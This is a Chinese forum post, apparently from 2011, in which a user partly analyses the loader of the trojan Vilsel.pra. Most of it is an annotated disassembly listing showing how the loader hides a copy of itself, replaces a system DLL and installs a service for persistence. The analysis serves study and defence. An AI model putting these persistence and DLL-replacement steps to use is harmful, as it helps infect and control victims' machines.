Trojan.Win32.Vilsel.pra Loader部分简单分析
本帖最后由 是昔流芳 于 2011-2-14 18:58 编辑今天手贱,看到个网站被挂马了,于是就把网马下载下来捏一捏.一开始分析的时候还挺怡然,分析到生成的DLL时就有些烦躁了.一看时间戳,09年11月的.运气真不是一般的好.把EXE部分的分析发上来吧,不多,半成品,勿笑.得赶作业去了......Loader部分分析
004012B2/$55 push ebp
004012B3|.8BEC mov ebp, esp
004012B5|.81EC 1C070000 sub esp, 71C
004012BB|.80A5 ECFAFFFF>and byte ptr , 0
004012C2|.53 push ebx
004012C3|.56 push esi
004012C4|.57 push edi
004012C5|.6A 40 push 40
004012C7|.33C0 xor eax, eax
004012C9|.59 pop ecx
004012CA|.8DBD EDFAFFFF lea edi, dword ptr
004012D0|.F3:AB rep stos dword ptr es:
004012D2|.80A5 F0FBFFFF>and byte ptr , 0
004012D9|.6A 40 push 40
004012DB|.66:AB stos word ptr es:
004012DD|.AA stos byte ptr es:
004012DE|.59 pop ecx
004012DF|.33C0 xor eax, eax
004012E1|.8DBD F1FBFFFF lea edi, dword ptr
004012E7|.80A5 F8FDFFFF>and byte ptr , 0
004012EE|.F3:AB rep stos dword ptr es:
004012F0|.66:AB stos word ptr es:
004012F2|.AA stos byte ptr es:
004012F3|.6A 40 push 40
004012F5|.33C0 xor eax, eax
004012F7|.59 pop ecx
004012F8|.8DBD F9FDFFFF lea edi, dword ptr
004012FE|.F3:AB rep stos dword ptr es:
00401300|.66:AB stos word ptr es:
00401302|.AA stos byte ptr es:
00401303|.8D85 F0FBFFFF lea eax, dword ptr
00401309|.BE 04010000 mov esi, 104
0040130E|.50 push eax ; /Buffer
0040130F|.56 push esi ; |BufSize => 104 (260.)
00401310|.FF15 54204000 call dword ptr [<&KERNEL32.GetTempPat>; \取系统临时文件夹目录
00401316|.FF15 50204000 call dword ptr [<&KERNEL32.GetTickCou>; [GetTickCount
0040131C|.50 push eax ; /<%d>
0040131D|.8D85 F0FBFFFF lea eax, dword ptr ; |
00401323|.50 push eax ; |<%s>
00401324|.8D85 F8FDFFFF lea eax, dword ptr ; |
0040132A|.68 5C5A4000 push 00405A5C ; |format = "%s%d.dat"
0040132F|.50 push eax ; |s
00401330|.FF15 70204000 call dword ptr [<&MSVCRT.sprintf>] ; \格式化字符串输出
00401336|.83C4 10 add esp, 10
00401339|.8D85 ECFAFFFF lea eax, dword ptr
0040133F|.56 push esi ; /BufSize
00401340|.50 push eax ; |PathBuffer
00401341|.6A 00 push 0 ; |hModule = NULL
00401343|.FF15 4C204000 call dword ptr [<&KERNEL32.GetModuleF>; \获取自身目录
00401349|.8D85 F8FDFFFF lea eax, dword ptr
0040134F|.50 push eax ; /NewName
00401350|.8D85 ECFAFFFF lea eax, dword ptr ; |
00401356|.50 push eax ; |ExistingName
00401357|.FF15 48204000 call dword ptr [<&KERNEL32.MoveFileA>>; \将自身复制到系统临时目录,重命名为1634560.dat
0040135D|.85C0 test eax, eax
0040135F|.74 11 je short 00401372 ;若复制成功,跳走
00401361|.6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT
00401363|.8D85 F8FDFFFF lea eax, dword ptr ; |
00401369|.6A 00 push 0 ; |NewName = NULL
0040136B|.50 push eax ; |ExistingName
0040136C|.FF15 44204000 call dword ptr [<&KERNEL32.MoveFileEx>; \重启后复制自身
00401372|> \BB 245A4000 mov ebx, 00405A24 ;ASCII "WmdmPmsn"
00401377|.6A 08 push 8
00401379|.53 push ebx
0040137A|.E8 81FCFFFF call 00401000
0040137F|.6A 0C push 0C
00401381|.68 145A4000 push 00405A14 ;ASCII "ADVAPI32.dll"
00401386|.E8 75FCFFFF call 00401000
0040138B|.80A5 FCFEFFFF>and byte ptr , 0
00401392|.83C4 10 add esp, 10
00401395|.33C0 xor eax, eax
00401397|.8DBD FDFEFFFF lea edi, dword ptr
0040139D|.6A 40 push 40
0040139F|.80A5 F4FCFFFF>and byte ptr , 0
004013A6|.59 pop ecx
004013A7|.80A5 E8F9FFFF>and byte ptr , 0
004013AE|.F3:AB rep stos dword ptr es:
004013B0|.66:AB stos word ptr es:
004013B2|.AA stos byte ptr es:
004013B3|.6A 40 push 40
004013B5|.33C0 xor eax, eax
004013B7|.59 pop ecx
004013B8|.8DBD F5FCFFFF lea edi, dword ptr
004013BE|.F3:AB rep stos dword ptr es:
004013C0|.66:AB stos word ptr es:
004013C2|.AA stos byte ptr es:
004013C3|.6A 40 push 40
004013C5|.33C0 xor eax, eax
004013C7|.59 pop ecx
004013C8|.8DBD E9F9FFFF lea edi, dword ptr
004013CE|.F3:AB rep stos dword ptr es:
004013D0|.66:AB stos word ptr es:
004013D2|.AA stos byte ptr es:
004013D3|.8B3D 40204000 mov edi, dword ptr [<&KERNEL32.GetSy>;kernel32.GetSystemDirectoryA
004013D9|.8D85 FCFEFFFF lea eax, dword ptr
004013DF|.56 push esi ; /BufSize
004013E0|.50 push eax ; |Buffer
004013E1|.FFD7 call edi ; \取系统目录
004013E3|.8D85 E8F9FFFF lea eax, dword ptr
004013E9|.56 push esi ; /BufSize
004013EA|.50 push eax ; |Buffer
004013EB|.FFD7 call edi ; \GetSystemDirectoryA
004013ED|.8D85 E4F8FFFF lea eax, dword ptr
004013F3|.56 push esi ; /BufSize
004013F4|.50 push eax ; |Buffer
004013F5|.FFD7 call edi ; \GetSystemDirectoryA
004013F7|.8D85 E4F8FFFF lea eax, dword ptr
004013FD|.68 4C5A4000 push 00405A4C ; /src = "\notepad.exe"
00401402|.50 push eax ; |dest
00401403|.E8 BE000000 call <jmp.&MSVCRT.strcat> ; \连接字符串%SystemRoot%\system32\notepad.exe
00401408|.59 pop ecx
00401409|.8D85 F4FCFFFF lea eax, dword ptr
0040140F|.59 pop ecx
00401410|.56 push esi
00401411|.50 push eax
00401412|.FFD7 call edi ;取系统目录
00401414|.8D85 FCFEFFFF lea eax, dword ptr
0040141A|.68 3C5A4000 push 00405A3C ; /src = "\mspmsnsv.dll"
0040141F|.50 push eax ; |dest
00401420|.E8 A1000000 call <jmp.&MSVCRT.strcat> ; \连接字符串%SystemRoot%\system32\mspmsnsv.dll
00401425|.8D85 F4FCFFFF lea eax, dword ptr
0040142B|.68 305A4000 push 00405A30 ; /src = "\Thumbes.db"
00401430|.50 push eax ; |dest
00401431|.E8 90000000 call <jmp.&MSVCRT.strcat> ; \连接字符串%SystemRoot%\system32\Thumbes.db
00401436|.53 push ebx
00401437|.E8 52FDFFFF call 0040118E ;打开服务控制管理器
0040143C|.83C4 14 add esp, 14
0040143F|.68 E8030000 push 3E8 ; /Timeout = 1000. ms
00401444|.FF15 3C204000 call dword ptr [<&KERNEL32.Sleep>] ; \暂停1s
0040144A|.8D85 FCFEFFFF lea eax, dword ptr
00401450|.50 push eax
00401451|.E8 ECFBFFFF call 00401042 ;进行字串处理,加载sfc_os.dll并调取5号资源
00401456|.59 pop ecx
00401457|.8D85 F4FCFFFF lea eax, dword ptr
0040145D|.50 push eax ; /NewName
0040145E|.8D85 FCFEFFFF lea eax, dword ptr ; |
00401464|.50 push eax ; |ExistingName
00401465|.FF15 48204000 call dword ptr [<&KERNEL32.MoveFileA>>; \将mspmsnsv.dll复制为Thumbes.db进行备份
0040146B|.FF35 00304000 push dword ptr
00401471|.8D85 FCFEFFFF lea eax, dword ptr
00401477|.68 04304000 push 00403004
0040147C|.50 push eax
0040147D|.E8 D8FDFFFF call 0040125A ;调用CreatrFile替换mspmsnsv.dll
00401482|.8D85 E4F8FFFF lea eax, dword ptr
00401488|.50 push eax
00401489|.8D85 FCFEFFFF lea eax, dword ptr
0040148F|.50 push eax
00401490|.E8 2DFCFFFF call 004010C2 ;打开mspmsnsv.dll和notepad.exe
00401495|.53 push ebx
00401495|.53 push ebx
00401496|.E8 74FDFFFF call 0040120F ;创建服务WmdmPmSN,设为启动状态
0040149B|.53 push ebx
0040149C|.E8 32FDFFFF call 004011D3 ;启动服务WmdmPmSN
004014A1|.83C4 1C add esp, 1C
004014A4|.5F pop edi
004014A5|.5E pop esi
004014A6|.5B pop ebx
004014A7|.C9 leave
004014A8\.C3 retn后面的DLL是插入NotePad.exe然后下载其它木马,时间紧(马上开学了,你懂的),就没详细分析. :)eee有空完整分析下吧. 不懂英文,呵呵,厉害。 支持教程!
页:
[1]